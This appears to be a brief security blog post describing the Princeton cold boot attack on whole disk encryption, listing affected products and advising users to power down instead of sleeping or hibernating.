There’s a lot of buzz in the security industry right now after a paper was published by some researchers from Princeton University that demonstrates how whole disk encryption systems can be completely thwarted by obtaining the encryption keys from a laptop’s RAM. How is this possible? Well, when an Operating System is in sleep mode the decryption keys are stored in memory to allow the operating system to boot back up and continue accessing the encrypted disk. In addition, different RAM chips decay their memory contents at different rates when power has been removed from the RAM chips. Cooling the RAM chips can slow that decay rate upwards of 10 minutes by using a simply air duster can turned upside down. Once the RAM chips are cooled, their contents can be dumped by booting to a USB disk with memory extraction tools, or if you’re unable to change the boot order, the chips can be removed and transferred to another system where the contents of the RAM chips can be extracted. Once the contents of RAM is extracted, code can be run to retrieve the encryption keys which can then be used to decrypt data off the disk. Scary eh?
The original paper by the Priceton researchers can be found here.
There’s also coverage of the issue by the SANS ISC here (including a video that demos the issue) and here (provides guidance for known whole disk encryption software).
Currently known affected products are Microsoft Bitlocker, Apple’s FileVault, and TrueCrypt. At the second ISC link, there’s information that PGP WDE and Utimaco SafeGuard are also vulnerable. No news yet from CheckPoint PointSec. However, one would assume that almost all whole disk encryption vendors would be vulnerable to this.
How do you safeguard against it? Power down your system instead of sleeping or hibernating.
Agree? Disagree? Let me know with a comment...